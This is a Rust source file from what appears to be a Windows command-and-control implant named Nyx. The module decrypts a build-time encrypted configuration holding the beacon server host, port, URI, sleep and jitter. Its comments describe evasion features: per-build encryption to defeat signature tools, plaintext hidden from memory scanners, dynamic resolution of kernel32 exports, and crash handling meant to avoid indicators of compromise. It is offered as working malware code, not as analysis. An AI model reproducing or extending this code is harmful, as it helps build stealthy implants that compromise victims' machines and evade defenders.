//! Per-build implant configuration.
//!
//! The config is baked at build time by `build.rs`: it reads `config.toml` (or
//! `NYX_CONFIG`), serializes it into a compact binary blob, encrypts it under
//! a fresh per-build ChaCha20-Poly1305 key+nonce, and emits `OUT_DIR/
//! config_blob.rs` with `CONFIG_KEY` / `CONFIG_NONCE` / `CONFIG_CT`. This
//! module re-includes those statics and decrypts + decodes them at runtime.
//!
//! Every build re-randomizes the key/nonce, so the static config bytes in the
//! final binary (and the surrounding layout) differ every build even when the
//! config values are identical — defeating static extractors/signature tools.
//!
//! Layout (must match `build.rs::bake_config`):
//! `str(host) | u16(port) | str(uri) | u32(sleep) | u8(jitter) | u8(tls)`

#![cfg(target_os = "windows")]

use crate::heap::{String, Vec};
use nyx_protocol::wire::{Reader, WireError}; // WireError kept for decode()'s Result

/// Build config baked into the implant at build time. The `server_pub` is baked
/// separately by `build.rs` (into `server_pub::SERVER_PUB`); it lives here so
/// the beacon loop has one place to read the full transport+session config.
pub struct Config {
    pub server_host: String,
    pub server_port: u16,
    pub beacon_uri: String,
    pub server_pub: [u8; 32],
    pub sleep_seconds: u32,
    pub jitter_pct: u8,
    pub use_tls: bool,
}

mod baked {
    // Generated by build.rs into OUT_DIR/config_blob.rs.
    include!(concat!(env!("OUT_DIR"), "/config_blob.rs"));
}

/// Decrypt + decode the embedded config blob into a [`Config`]. Called once at
/// entry (`beacon_loop` bootstrap). A failure here is fatal: either the
/// embedded config was tampered with (Poly1305 tag mismatch) or the build is
/// broken (blob shape wrong). Panics on either — the implant cannot beacon
/// without a config.
///
/// Returns `(Config, Vec<u8>)` — the decoded config and the raw decrypted
/// plaintext bytes. The caller MUST leak the `Vec<u8>` (via
/// [`mem::register_owned`]) so the plaintext sits in maskable memory for the
/// process lifetime. This prevents memory scanners from reading the decrypted
/// config at rest.
pub fn load() -> (Config, Vec<u8>) {
    let plain: Vec<u8> =
        nyx_config::decrypt(&baked::CONFIG_KEY, &baked::CONFIG_NONCE, baked::CONFIG_CT);
    match decode(&plain) {
        Ok(c) => (c, plain),
        Err(_) => {
            // Tampered or malformed baked config — the implant cannot proceed.
            // Try ExitProcess → TerminateProcess → int3 in order. A crash is
            // better than a hanging process (visible IOC).
            unsafe {
                if let Some(addr) = crate::resolve::export_addr(b"kernel32.dll", b"ExitProcess") {
                    let f: extern "system" fn(u32) -> ! = core::mem::transmute(addr);
                    f(0xC000_0001);
                }
                // ExitProcess failed — try TerminateProcess.
                if let Some(addr) =
                    crate::resolve::export_addr(b"kernel32.dll", b"TerminateProcess")
                {
                    type FnTerm = unsafe extern "system" fn(*mut core::ffi::c_void, u32) -> i32;
                    let f: FnTerm = core::mem::transmute(addr);
                    f((-1isize) as *mut core::ffi::c_void, 1);
                }
                // Last resort: clean crash (distinguishable from hang).
                core::arch::asm!("int3");
            }
            loop {
                core::hint::spin_loop();
            }
        }
    }
}

/// Decode a plaintext config blob into a [`Config`]. Public so a selftest can
/// feed it a synthetic blob without going through the (host-side) encryption.
pub fn decode(blob: &[u8]) -> Result<Config, WireError> {
    let mut r = Reader::new(blob);
    let server_host = r.str()?;
    let server_port = r.u16()?;
    let beacon_uri = r.str()?;
    let sleep_seconds = r.u32()?;
    let jitter_pct = r.u8()?;
    let use_tls_byte = r.u8()?;
    Ok(Config {
        server_host,
        server_port,
        beacon_uri,
        server_pub: crate::server_pub::SERVER_PUB,
        sleep_seconds,
        jitter_pct,
        use_tls: use_tls_byte != 0,
    })
}
